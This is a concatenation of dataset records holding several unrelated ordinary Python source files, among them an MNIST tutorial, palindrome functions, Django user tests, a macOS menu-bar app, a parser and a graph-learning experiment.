sentiment))\n return ret\n","sub_path":"AE_Sememes/AE_CSA/code_aecsa/test/data_utils_sentihood.py","file_name":"data_utils_sentihood.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40991963","text":"\"\"\"\nImplementation of POSFrequencyPipeline for score ten only.\n\"\"\"\nimport collections\nfrom pathlib import Path\nimport re\nfrom pipeline import TextProcessingPipeline\nfrom constants import ASSETS_PATH\nfrom visualizer import visualize\n\nclass POSFrequencyPipeline:\n def run(self):\n # we guess that all files are already preprocessed in a dir\n pattern = re.compile(\"\\(\\w+\")\n path = Path(ASSETS_PATH)\n files = list(path.glob('**/*_processed.txt'))\n if not files:\n print(\"no info to plot\")\n speech_parts = collections.Counter()\n for file in files:\n with open(file) as f:\n data = f.read()\n strings = [i[1:] for i in re.findall(pattern, data)]\n speech_parts.update(strings)\n visualize(speech_parts, \"picture.png\")\n\ndef main():\n pipeline = POSFrequencyPipeline()\n pipeline.run()\n\nif __name__ == '__main__':\n main()\n","sub_path":"pos_frequency_pipeline.py","file_name":"pos_frequency_pipeline.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"185962699","text":"import unittest\nfrom test_sqlite_insert_user_story import DatabaseInsert\nclass TestInsert(unittest.TestCase):\n def test_uno(self):\n db=DatabaseInsert()\n self.assertEqual(len(db.userstories),0)\n \n\n\nif __name__ == '__name__':\n unittest.main()\n","sub_path":"test_insert.py","file_name":"test_insert.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"340641089","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nfrom tutorials.hvassTutorials.helperFunction import plot_example_errors,plot_confusion_matrix\nimport time\nfrom datetime import timedelta\nimport math\n\n# We also need PrettyTensor.\n# pip3 install prettytensor\nimport prettytensor as pt\n\nfrom tensorflow.examples.tutorials.mnist import input_data\ndata = input_data.read_data_sets('data/MNIST/', one_hot=True)\n\ndata.test.cls = np.argmax(data.test.labels, axis=1)\n\n# We know that MNIST images are 28 pixels in each dimension.\nimg_size = 28\n\n# Images are stored in one-dimensional arrays of this length.\nimg_size_flat = img_size * img_size\n\n# Tuple with height and width of images used to reshape arrays.\nimg_shape = (img_size, img_size)\n\n# Number of colour channels for the images: 1 channel for gray-scale.\nnum_channels = 1\n\n# Number of classes, one class for each of 10 digits.\nnum_classes = 10\n\nx = tf.placeholder(tf.float32, shape=[None, img_size_flat], name='x')\n\nx_image = tf.reshape(x, [-1, img_size, img_size, num_channels])\n\ny_true = tf.placeholder(tf.float32, shape=[None, num_classes], name='y_true')\n\ny_true_cls = tf.argmax(y_true, dimension=1)\n\n\nx_pretty = pt.wrap(x_image)\n\nwith pt.defaults_scope(activation_fn=tf.nn.relu):\n y_pred, loss = x_pretty.\\\n conv2d(kernel=5, depth=16, name='layer_conv1').\\\n max_pool(kernel=2, stride=2).\\\n conv2d(kernel=5, depth=36, name='layer_conv2').\\\n max_pool(kernel=2, stride=2).\\\n flatten().\\\n fully_connected(size=128, name='layer_fc1').\\\n softmax_classifier(num_classes=num_classes, labels=y_true)\n\n\ndef get_weights_variable(layer_name):\n # Retrieve an existing variable named 'weights' in the scope\n # with the given layer_name.\n # This is awkward because the TensorFlow function was\n # really intended for another purpose.\n\n with tf.variable_scope(layer_name, reuse=True):\n variable = tf.get_variable('weights')\n\n return variable\n\n\nweights_conv1 = get_weights_variable(layer_name='layer_conv1')\nweights_conv2 = get_weights_variable(layer_name='layer_conv2')\n\noptimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss)\n\ny_pred_cls = tf.argmax(y_pred, dimension=1)\n\ncorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\n\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsession = tf.Session()\nsession.run(tf.global_variables_initializer())\n\ntrain_batch_size = 64\n\n# Counter for total number of iterations performed so far.\ntotal_iterations = 0\n\ndef optimize(num_iterations):\n # Ensure we update the global variable rather than a local copy.\n global total_iterations\n\n # Start-time used for printing time-usage below.\n start_time = time.time()\n\n for i in range(total_iterations,\n total_iterations + num_iterations):\n\n # Get a batch of training examples.\n # x_batch now holds a batch of images and\n # y_true_batch are the true labels for those images.\n x_batch, y_true_batch = data.train.next_batch(train_batch_size)\n\n # Put the batch into a dict with the proper names\n # for placeholder variables in the TensorFlow graph.\n feed_dict_train = {x: x_batch,\n y_true: y_true_batch}\n\n # Run the optimizer using this batch of training data.\n # TensorFlow assigns the variables in feed_dict_train\n # to the placeholder variables and then runs the optimizer.\n session.run(optimizer, feed_dict=feed_dict_train)\n\n # Print status every 100 iterations.\n if i % 100 == 0:\n # Calculate the accuracy on the training-set.\n acc = session.run(accuracy, feed_dict=feed_dict_train)\n\n # Message for printing.\n msg = \"Optimization Iteration: {0:>6}, Training Accuracy: {1:>6.1%}\"\n\n # Print it.\n print(msg.format(i + 1, acc))\n\n # Update the total number of iterations performed.\n total_iterations += num_iterations\n\n # Ending time.\n end_time = time.time()\n\n # Difference between start and end-times.\n time_dif = end_time - start_time\n\n # Print the time-usage.\n print(\"Time usage: \" + str(timedelta(seconds=int(round(time_dif)))))\n\n# Split the test-set into smaller batches of this size.\ntest_batch_size = 256\n\ndef print_test_accuracy(show_example_errors=False,\n show_confusion_matrix=False):\n\n # Number of images in the test-set.\n num_test = len(data.test.images)\n\n # Allocate an array for the predicted classes which\n # will be calculated in batches and filled into this array.\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n\n # Now calculate the predicted classes for the batches.\n # We will just iterate through all the batches.\n # There might be a more clever and Pythonic way of doing this.\n\n # The starting index for the next batch is denoted i.\n i = 0\n\n while i < num_test:\n # The ending index for the next batch is denoted j.\n j = min(i + test_batch_size, num_test)\n\n # Get the images from the test-set between index i and j.\n images = data.test.images[i:j, :]\n\n # Get the associated labels.\n labels = data.test.labels[i:j, :]\n\n # Create a feed-dict with these images and labels.\n feed_dict = {x: images,\n y_true: labels}\n\n # Calculate the predicted class using TensorFlow.\n cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict)\n\n # Set the start-index for the next batch to the\n # end-index of the current batch.\n i = j\n\n # Convenience variable for the true class-numbers of the test-set.\n cls_true = data.test.cls\n\n # Create a boolean array whether each image is correctly classified.\n correct = (cls_true == cls_pred)\n\n # Calculate the number of correctly classified images.\n # When summing a boolean array, False means 0 and True means 1.\n correct_sum = correct.sum()\n\n # Classification accuracy is the number of correctly classified\n # images divided by the total number of images in the test-set.\n acc = float(correct_sum) / num_test\n\n # Print the accuracy.\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n\n # Plot some examples of mis-classifications, if desired.\n if show_example_errors:\n print(\"Example errors:\")\n plot_example_errors(cls_pred=cls_pred, correct=correct)\n\n # Plot the confusion matrix, if desired.\n if show_confusion_matrix:\n print(\"Confusion Matrix:\")\n plot_confusion_matrix(cls_pred=cls_pred)","sub_path":"tutorials/hvassTutorials/prettyTensor.py","file_name":"prettyTensor.py","file_ext":"py","file_size_in_byte":6670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"603765809","text":"from itertools import count\n\ndef unique(L):\n\tseen = set()\n\tfor l in L:\n\t\tif l not in seen:\n\t\t\tyield l\n\t\t\tseen.add(l)\n\na = list([n for n in range(2, 10000) if(2**(n-1))%n == 1])\n\nlen(a)\n\n#b = [n for n in range(2, 1000000) if all((k**(n-1))%n == 1 for k in range(2, 10))]\n\n#print(b)\n\npseudoPrime = lambda n: all((k**(n-1))%n == 1 for k in range(2, 10) if k!=n)\n\nfor i in count(2):\n\tif pseudoPrime(i) and not is_prime(i):\n\t\tprint(i)","sub_path":"15.12.2016predavanje.py","file_name":"15.12.2016predavanje.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377685486","text":"def is_palindrome(word):\r\n \"\"\" (str) -> bool\r\n \r\n Precondition: used only for strings that consist only of lowercase \r\n alphabetic characters.\r\n \r\n Return True iff word is a palindrome. \r\n \r\n Examples:\r\n >>> is_palindrome(\"radar\")\r\n True\r\n >>> is_palindrome(\"hello\")\r\n False\r\n >>> is_palindrome(\"goodbye\")\r\n False\r\n >>> is_palindrome(\"a\")\r\n True\r\n >>> is_palindrome(\"\")\r\n True\r\n \r\n \"\"\"\r\n \r\n reverse_word = \"\"\r\n index = len(word) - 1 \r\n \"\"\"we will start adding characters in reverse_word starting from the last \r\n character in word\"\"\"\r\n \r\n while(index > -1):\r\n reverse_word = reverse_word + word[index] \r\n index = index - 1\r\n \"\"\" adds the characters from word to reverse_word starting from the last \r\n character in word and ending at the first character in word.\"\"\"\r\n \r\n return word == reverse_word\r\n\r\ndef is_palindromic_phrase(phrase):\r\n \"\"\" (str) -> bool\r\n \r\n Return True iff phrase is a palindrome (disregarding non-alphabetic \r\n characters and treating uppercase letters and lowercase letters as the\r\n same).\r\n \r\n Examples:\r\n >>> is_palindromic_phrase(\"radar\")\r\n True\r\n >>> is_palindromic_phrase(\"Radar\")\r\n True\r\n >>> is_palindromic_phrase(\"Ra d Ar\")\r\n True\r\n >>> is_palindromic_phrase(\"rad?ar\")\r\n True\r\n >>> is_palindromic_phrase(\"radar9\")\r\n True\r\n >>> is_palindromic_phrase(\"radart\")\r\n False\r\n >>> is_palindromic_phrase(\"12321\")\r\n True\r\n \r\n \"\"\"\r\n \r\n index = 0\r\n \r\n \"\"\"In the following while loop I remove non-alphabetic characters from \r\n phrase and assign the result to new_phrase.\"\"\"\r\n \r\n new_phrase = phrase\r\n while index < len(new_phrase):\r\n if not(new_phrase[index].isalpha()):\r\n if(new_phrase[index] == len(new_phrase) - 1):\r\n new_phrase = new_phrase[:index]\r\n index = index - 1\r\n else: \r\n new_phrase = new_phrase[:index] + new_phrase[index + 1:]\r\n index = index - 1\r\n index = index + 1 \r\n \r\n new_phrase = new_phrase.lower() \r\n \"\"\" I added the above code because we treat uppercase and lowercase letters\r\n in the same way.\"\"\"\r\n \r\n \r\n return is_palindrome(new_phrase)\r\n \r\ndef get_odd_palindrome_at(word, center_index):\r\n \"\"\" (str, int) -> str\r\n \r\n Precondition: All the characters in word are lowercase alphabetical \r\n characters. center_index must be in the bounds of word.\r\n \r\n Return the longest palindrome that has an odd length whose center is \r\n at center_index in the word string.\r\n \r\n Examples: \r\n >>> get_odd_palindrome_at(\"oradarp\", 3)\r\n 'radar'\r\n >>> get_odd_palindrome_at(\"pada\", 2)\r\n 'ada'\r\n >>> get_odd_palindrome_at(\"acca\", 2)\r\n 'c'\r\n \r\n \"\"\"\r\n\r\n forward_index = center_index + 1\r\n backward_index = center_index - 1\r\n palindromes = []\r\n longest_palindrome = \"\"\r\n \r\n \r\n \"\"\" The following loop checks to see whether each odd-length sequence of \r\n characters whose center is at center_index is a palidrome. If it is a \r\n palindrome, it is added to the palindromes list. \"\"\"\r\n while((forward_index < len(word)) and (backward_index > -1)):\r\n\r\n if is_palindrome(word[backward_index:forward_index + 1]):\r\n palindromes.append(word[backward_index:forward_index + 1])\r\n \r\n forward_index += 1\r\n backward_index -= 1\r\n \r\n if len(palindromes) == 1: \r\n \"\"\" If we've only added one palindrome to the list then it is by default\r\n the biggest palindrome in the string.\"\"\"\r\n return palindromes[0]\r\n elif len(palindromes) == 0:\r\n \"\"\"We must also evaluate the case where there have been no palindromes \r\n added the list. However, we could single alphabetic characters as \r\n palindromes, thus we can return the character at the center_index as \r\n the largest palindrome in the string.\"\"\"\r\n return word[center_index]\r\n else:\r\n for p in range(1, len(palindromes)):\r\n longest_palindrome = max(palindromes[p], palindromes[p - 1])\r\n return longest_palindrome\r\n \r\n ","sub_path":"palindromes.py","file_name":"palindromes.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"379550312","text":"#coding=utf8\nimport rumps\nimport urllib\nimport json,sys\n# reload(sys)\n# sys.setdefaultencoding( \"utf-8\" )\n\nclass AutosenseIOSApp(rumps.App):\n\n def __init__(self,_):\n self.configure()\n\n def configure(self):\n menus = []\n menus.append(\"Device List\")\n menus.append(rumps.MenuItem(\"Edit Config ...\", key=','))\n super(AutosenseIOSApp, self).__init__(type(self).__name__, menu=menus)\n self.icon = 'app.icns'\n\n @rumps.timer(60)\n def location(self, _):\n title = ''\n url = \"https://api.map.baidu.com/location/ip?ak=uFdtjZNA62UtZUi2tjdGXjIaxOt947nM\"\n j = json.loads( urllib.urlopen( url ).read() )\n title = title + j['content']['address_detail']['province'] + '|' + j['content']['address_detail']['city']\n self.title = title\n\n @rumps.clicked(\"Edit Config ...\")\n def Config(self, _):\n window = rumps.Window(dimensions=(320,120),ok=u\"确定\",cancel=\"Cancel\",)\n window.title = 'Dietary Restrictions'\n window.message = 'Information regarding dietary restrictions.'\n window.default_text = 'mlh.get_dietary_users()'\n window.run()\n\n @rumps.clicked('Start Server')\n def button(self, sender):\n sender.title = 'Server: Off' if 'On' in sender.title else 'Server: On'\n rumps.notification(\"MacIOS USB Device\", None, \"UDID: 358520080883866\\nOS: iPhone10,4\")\n\n @rumps.clicked(\"Preferences\")\n def prefs(self, _):\n rumps.alert(\"jk! no preferences available!\")\n\n @rumps.clicked(\"Silly button\")\n def onoff(self, sender):\n print(sender.state)\n sender.state = not sender.state\n \n @rumps.clicked(\"Say hi\")\n def sayhi(self, _):\n rumps.Window(\"I can't think of a good example app...\").run()\n\n\nif __name__ == \"__main__\":\n AutosenseIOSApp(\"MacAutoIOS\").run()\n # app = rumps.App(\"AutosenseIOSApp\", icon='demo.icns')\n # app.menu = [\n # 'Attendees',\n # {\n # 'MLH': {\n # \"Guides\": [\"Organiser\", \"Sanctions\", \"Code of Conduct\"],\n # \"Contacts\": [\"Info\", \"Slack\", \"Incidents\"],\n # \"Website\": []\n # }\n # },\n # None,\n # 'About',\n # None\n # ]\n # app.run()","sub_path":"local/projects/pygui/MacIOS_GUI.py","file_name":"MacIOS_GUI.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"496102220","text":"import os\nimport io\nimport boto3\nimport pandas as pd\nfrom json import dump\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\ndef process_data(students, teachers):\n result = []\n for _, row in teachers.iterrows():\n student_data = []\n for _, _row in students[students['cid'] == row['cid']].iterrows():\n student_data.append({\n 'student_id': _row['id'],\n 'student_name': _row['fname'] + ' ' + _row['lname'],\n 'email': _row['email'],\n 'ssn': _row['ssn'],\n 'address': _row['address']\n })\n result.append({\n 'class_id': row['cid'],\n 'teacher_id': row['id'],\n 'teacher_name': row['fname'] + ' ' + row['lname'],\n 'students': student_data\n })\n\n try:\n with open('output.json', 'w') as outfile:\n dump(result, outfile, indent=4)\n print('output.json file generated successfully')\n except Exception as ex:\n print('Unable to create output.json')\n\n\ndef read_files(file_path, n):\n print('Processing...')\n students = teachers = None\n if n == 1:\n for path in file_path:\n if path.endswith('.parquet'):\n teachers = pd.read_parquet(path, engine='pyarrow')\n elif path.endswith('.csv'):\n students = pd.read_csv(path, delimiter='_')\n elif n == 2:\n try:\n s3 = boto3.client('s3',\n region_name=os.getenv('AWS_REGION_NAME'),\n aws_access_key_id=os.getenv('AWS_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY')\n )\n for path in file_path:\n bucket = path.split('/')[0]\n file_name = path.replace(bucket + '/', '')\n obj = s3.get_object(Bucket=bucket, Key=file_name)\n if path.endswith('.parquet'):\n teachers = pd.read_parquet(io.BytesIO(obj['Body'].read()), engine='pyarrow')\n elif path.endswith('.csv'):\n students = pd.read_csv(io.BytesIO(obj['Body'].read()), delimiter='_')\n except Exception as err:\n print(\"Something went wrong, please check file paths and credentials\")\n print(err)\n process_data(students, teachers)\n\n\nif __name__ == \"__main__\":\n\n try:\n print(\"Select the file storage from the options given below :\\n\")\n print(\"1. Local file storage.\\n2. AWS S3\\n\")\n n = int(input(\">> \"))\n print()\n file_path=[]\n if n == 1:\n file_path = [\"./dataset/students.csv\", \"./dataset/teachers.parquet\"]\n elif n == 2:\n print(\"Enter complete S3 file path, eg:- bucket/folder/students.csv\")\n students = input(\"path for students file : \")\n teachers = input(\"path for teachers file : \")\n file_path = [students, teachers]\n if not teachers.endswith('.parquet') or not students.endswith('.csv'):\n print(\"Entered invalid paths, please try again.\")\n exit(0)\n else:\n print(\"Invalid selection, please try again.\")\n exit(0)\n read_files(file_path, n)\n except Exception as ex:\n print('Files not found, please check file paths and try again')\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"175627013","text":"import random\n\nfrom simulator import *\n\n\ndef naive_pareto_frontier(ds):\n def better(xs, ys):\n assert len(xs) == len(ys)\n return all(x <= y for x, y in zip(xs, ys))\n ds = list(ds)\n assert len(ds) == len(set(ds))\n new_ds = []\n for i, a in enumerate(ds):\n if any(better(b, a) for b in new_ds):\n continue\n if any(better(ds[j], a) for j in range(i+1, len(ds))):\n continue\n new_ds.append(a)\n return new_ds\n\n\ndef pareto_frontier(ds):\n assert all(isinstance(d, tuple) for d in ds)\n ds = sorted(ds)\n fs = []\n for d in ds:\n if any(all(x <= y for x, y in zip(f, d)) for f in fs):\n continue\n fs.append(d)\n return fs\n","sub_path":"production/pareto.py","file_name":"pareto.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"427301539","text":"# Copyright 2010-2011 Isotoma Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom yay.pyparsing import *\n\nfrom yay import nodes\n\nclass Parser(object):\n def __init__(self, composer):\n self.composer = composer\n\n if composer and composer.secret:\n self.secret = True\n else:\n self.secret = False\n\n self.setup_parser()\n\n def box(self, value):\n b = nodes.Boxed(value)\n b.secret = self.secret\n return b\n\n def dollar(self, str, words, tokens):\n return self.box(\"$\")\n\n def boxed_string(self, str, words, tokens):\n return self.box(tokens[0])\n\n def boxed_int(self, str, words, tokens):\n return self.box(int(tokens[0]))\n\n def boxed_octal(self, str, words, tokens):\n return self.box(int(tokens[0], 8))\n\n def concatenation(self, str, words, tokens):\n if len(tokens) == 1:\n return tokens[0]\n c = nodes.Concatenation(*tokens)\n c.secret = self.secret\n return c\n\n def function_call_action(self, s, w, t):\n return nodes.Function(t[0], t[1])\n\n def filter_bin_comparison_action(self, s, w, t):\n cls = {\n \"=\": nodes.Equal,\n \"!=\": nodes.NotEqual,\n \"<\": nodes.LessThan,\n \"<=\": nodes.LessThanEqual,\n \">\": nodes.GreaterThan,\n \">=\": nodes.GreaterThanEqual,\n }[t[0][1]]\n return cls(t[0][0], t[0][2])\n\n def filter_expression_action(self, s, w, t):\n node = t[0]\n for i in range(1, len(t)):\n if t[i] == \"and\":\n node = nodes.And(node, t[i+1])\n elif t[i] == \"or\":\n node = nodes.Or(node, t[i+1])\n i += 1\n return node\n\n def handle_expression(self, s, w, t):\n if len(t[0]) == 1:\n return t[0]\n\n t = t[0]\n\n node = nodes.Else(t[0])\n\n for i in range(1, len(t)):\n if i % 2:\n if t[i] != \"else\":\n #FIXME: Raise some kind of parasing error\n pass\n else:\n node.append(t[i])\n\n return [node]\n\n def index_access_action(self, s, w, t):\n return nodes.Access(None, t[0])\n\n def full_expression_action(self, s, w, t):\n node = None\n for token in t:\n if not isinstance(token, nodes.Node):\n node = nodes.Access(node, nodes.Boxed(token))\n else:\n token.container = node\n if node:\n node.set_parent(token)\n node = token\n\n return node\n\n def ugh(self, s, w, t):\n if not t or not t[0]:\n return []\n return self.boxed_string(s, w, t)\n\n def inline_call(self, s, w, t):\n return nodes.Call(self.composer, t[0])\n\n def setup_parser(self):\n ELSE = Keyword(\"else\")\n AND = Keyword(\"and\")\n OR = Keyword(\"or\")\n IN = Keyword(\"in\")\n BINOP = oneOf(\"= != < > <= >=\")\n\n identifier = Word(alphanums+\"_\") | Keyword(\"@\")\n arithSign = Word(\"+-\",exact=1)\n\n octNum = Combine(Optional(arithSign) + Suppress(\"0\") + Word(nums)).setParseAction(self.boxed_octal)\n intNum = Combine(Optional(arithSign) + Word(nums)).setParseAction(self.boxed_int)\n\n expression = Forward()\n\n macro_call = Word(alphanums+\"_.\") + Suppress(\"!\")\n macro_call.setParseAction(self.inline_call)\n\n function_identifier = Word(alphanums+\"_\")\n function_call = function_identifier + Group(Suppress(\"(\") + Optional(expression + ZeroOrMore(Suppress(\",\") + expression)) + Suppress(\")\"))\n function_call.setParseAction(self.function_call_action)\n\n filterExpression = Forward()\n\n filter_bin_comparison = Group(expression + BINOP + expression)\n filter_bin_comparison.setParseAction(self.filter_bin_comparison_action)\n\n filterCondition = (\n filter_bin_comparison |\n ( \"(\" + filterExpression + \")\" )\n )\n\n filterExpression << filterCondition + ZeroOrMore((AND|OR) + filterExpression)\n filterExpression.setParseAction(self.filter_expression_action)\n\n full_list_access = Suppress(\"[\") + filterExpression + Suppress(\"]\")\n full_list_access.setParseAction(lambda s, w, t: nodes.Filter(None, t[0]))\n\n listAccess = Suppress(\"[\") + expression + Suppress(\"]\")\n listAccess.setParseAction(self.index_access_action)\n\n\n fullExpression = identifier + ZeroOrMore(\n full_list_access |\n listAccess |\n Suppress(\".\") + identifier\n )\n fullExpression.setParseAction(self.full_expression_action)\n\n expression_part = (\n octNum |\n intNum |\n macro_call |\n function_call |\n fullExpression\n )\n\n expression << Group(expression_part + Optional(ELSE + expression)).setParseAction(self.handle_expression)\n\n bracketed_expression = Suppress(\"${\").leaveWhitespace() + expression + Suppress(\"}\").leaveWhitespace()\n\n myrol = restOfLine.copy().setParseAction(self.ugh)\n\n templated_string = ZeroOrMore(\n Keyword(\"$$\").setParseAction(self.dollar) |\n bracketed_expression |\n SkipTo(\"${\").leaveWhitespace().setParseAction(self.boxed_string)\n ) + myrol\n templated_string.setParseAction(self.concatenation)\n\n foreachif = Optional(Keyword(\"if\") + filterExpression)\n\n foreach_statement = identifier + Suppress(\"in\") + expression + Optional(Keyword(\"chain\") | Keyword(\"nochain\") | Keyword(\"flatten\")) + foreachif\n as_statement = expression + Suppress(\"as\") + identifier\n\n self.templated_string = templated_string\n self.foreach_statement = foreach_statement\n self.as_statement = as_statement\n self.expression = expression\n\n","sub_path":"yay/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"261888396","text":"from PIL import ImageGrab\nimport os\nimport time\nimport win32api, win32con\nimport json\nimport datetime\nfrom az_code import *\nfrom PIL import ImageOps\nfrom numpy import *\n\n\ndef click_menu(timer=2):\n\tmove_and_click((995,941), timer)\n\n\ndef click_punch(timer=2):\n\tmove_and_click((1408,916), timer)\n\n\ndef click_stop(timer):\n\tmove_and_click((1384,947), timer)\n\n\ndef get_rewards(timer):\n\tmove_and_click((1135,935), timer)\n\ndef punch():\n\tclick_menu()\n\tclick_punch()\n\tclick_stop(1.6)\n\tclick_stop(2)\n\tclick_stop(3.05)\n\tclick_stop(3.1)\n\ttime.sleep(40)\n\tget_rewards(4)\n\tget_rewards(4)\n\tget_rewards(4)\n\n\nif __name__ == '__main__':\n\tn = 30\n\twhile n > 0:\n\t\tpunch()\n\t\tn -= 1\n\t#output_cords()","sub_path":"src/az_puncher.py","file_name":"az_puncher.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574717617","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse, resolve\nfrom allauth.account.views import SignupView\n\n\nclass CustomUserTests(TestCase):\n def test_create_user(self):\n User = get_user_model()\n user = User.objects.create_user(\n username='dannv',\n email='dannv@email.com',\n password='testpass123456'\n )\n self.assertEqual(user.username, 'dannv')\n self.assertEqual(user.email, 'dannv@email.com')\n self.assertTrue(user.is_active),\n self.assertFalse(user.is_staff)\n self.assertFalse(user.is_superuser)\n \n def test_create_superuser(self):\n User = get_user_model()\n user = User.objects.create_superuser(\n username='superadmin',\n email='admin@superuser.com',\n password='123456a@'\n )\n self.assertEqual(user.username, 'superadmin')\n self.assertEqual(user.email, 'admin@superuser.com')\n self.assertTrue(user.is_active)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_superuser)\n\n\nclass SignupPageTests(TestCase):\n username = \"newuser\"\n email = \"newuser@email.com\"\n\n def setUp(self):\n url = reverse('account_signup')\n self.resp = self.client.get(url)\n\n def test_signup_template(self):\n self.assertEqual(self.resp.status_code, 200)\n self.assertTemplateUsed(self.resp, 'account/signup.html')\n self.assertContains(self.resp, 'Sign Up')\n self.assertNotContains(self.resp, 'Hi there! I should not be on the page.')\n\n def test_signup_form(self):\n get_user_model().objects.create_user(self.username, self.email)\n self.assertContains(self.resp, 'csrfmiddlewaretoken')\n self.assertEqual(get_user_model().objects.all().count(), 1)\n self.assertEqual(get_user_model().objects.all()[0].username, self.username)\n self.assertEqual(get_user_model() .objects.all()[0].email, self.email)\n\n def test_signup_view(self):\n view = resolve('/accounts/signup/')\n self.assertEqual(view.func.__name__, SignupView.as_view().__name__)\n","sub_path":"users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"337402138","text":"## Graph learning and signal learning \r\nimport numpy as np\r\nfrom matplotlib.pylab import *\r\nimport matplotlib.pyplot as plt\r\nimport os \r\nos.chdir('C:/Kaige_Research/Graph Learning/graph_learning_code/')\r\nfrom sklearn.metrics.pairwise import rbf_kernel, euclidean_distances\r\nimport seaborn as sns\r\nfrom synthetic_data import *\r\nfrom primal_dual_gl import Primal_dual_gl \r\nfrom utils import *\r\nfrom pygsp import graphs, plotting, filters\r\nimport pyunlocbox\r\nimport networkx as nx \r\nfrom gl_sigrep import Gl_sigrep\r\npath='C:/Kaige_Research/Graph Learning/graph_learning_code/results/test_results2/'\r\ntimeRun = datetime.datetime.now().strftime('_%m_%d_%H_%M_%S') \r\n\r\nnode_num=20\r\nsignal_num=100\r\nerror_sigma=0.1\r\nadj_matrix, knn_lap, knn_pos=rbf_graph(node_num)\r\nX, X_noise, item_features=generate_signal(signal_num, node_num, knn_pos, error_sigma)\r\n\r\nnewpath=path+'error_sigma_%s'%(int(error_sigma*100))+str(timeRun)+'/'\r\nif not os.path.exists(newpath):\r\n\t os.makedirs(newpath)\r\n\r\nsignals=X_noise\r\n\r\nsignal_error_reference=[]\r\nsignal_error_list=[]\r\ngraph_error_list=[]\r\ntrace1=[]\r\ntrace2=[]\r\ntrace3=[]\r\ntrace4=[]\r\ntrace5=[]\r\nsmoothness=[]\r\nprimal_adj=np.identity(node_num)\r\nfor i in range(5):\r\n\tprint('i', i)\r\n\tZ=euclidean_distances(signals.T, squared=True)\r\n\tnp.fill_diagonal(Z, 0)\r\n\tZ=norm_W(Z, node_num)\r\n\r\n\t##graph learning \r\n\talpha=1## bigger alpha --- bigger weights\r\n\tbeta=0.2 ### bigger beta --- more dense ## For GL_sigrep beta is not used.\r\n\ttheta=0.01\r\n\t#primal_gl=Gl_sigrep(node_num, Z, alpha=alpha, beta=beta, step_size=0.5)\r\n\tprimal_gl=Primal_dual_gl(node_num, Z, alpha=alpha, beta=beta, step_size=0.01)\r\n\tprimal_adj, error=primal_gl.run(adj_matrix)\r\n\tlaplacian=csgraph.laplacian(primal_adj, normed=False)\r\n\tsignals=np.dot(signals, np.linalg.inv((np.identity(node_num)+theta*laplacian)))\r\n\tsmooth=calculate_smoothness(signals, laplacian)\r\n\tsmoothness.append(smooth)\r\n\r\n\r\n\t#print('adj_matrix \\n', adj_matrix)\r\n\t#print('primal_adj \\n', primal_adj)\r\n\r\n\tprint('X\\n', X[0,:])\r\n\tprint('signals\\n', signals[0,:])\r\n\r\n\tsignal_error_ref=np.linalg.norm(X_noise-X)\r\n\tsignal_error=np.linalg.norm(signals-X)\r\n\tgraph_error=np.linalg.norm(primal_adj-adj_matrix)\r\n\tsignal_error_reference.extend([signal_error_ref])\r\n\tsignal_error_list.extend([signal_error])\r\n\tgraph_error_list.extend([graph_error])\r\n\r\n\ttr1=np.trace(np.dot(signals, np.dot(laplacian, signals.T) ))\r\n\ttr2=np.trace(np.dot(signals, np.dot(knn_lap, signals.T)))\r\n\ttrace1.extend([tr1])\r\n\ttrace2.extend([tr2])\r\n\r\n\ttr3=np.trace(np.dot(X, np.dot(laplacian, X.T) ))\r\n\ttr4=np.trace(np.dot(X, np.dot(knn_lap, X.T)))\r\n\ttrace3.extend([tr3])\r\n\ttrace4.extend([tr4])\r\n\r\n\ttr5=np.trace(np.dot(X_noise, np.dot(knn_lap, X_noise.T)))\r\n\ttrace5.extend([tr5])\r\n\r\n 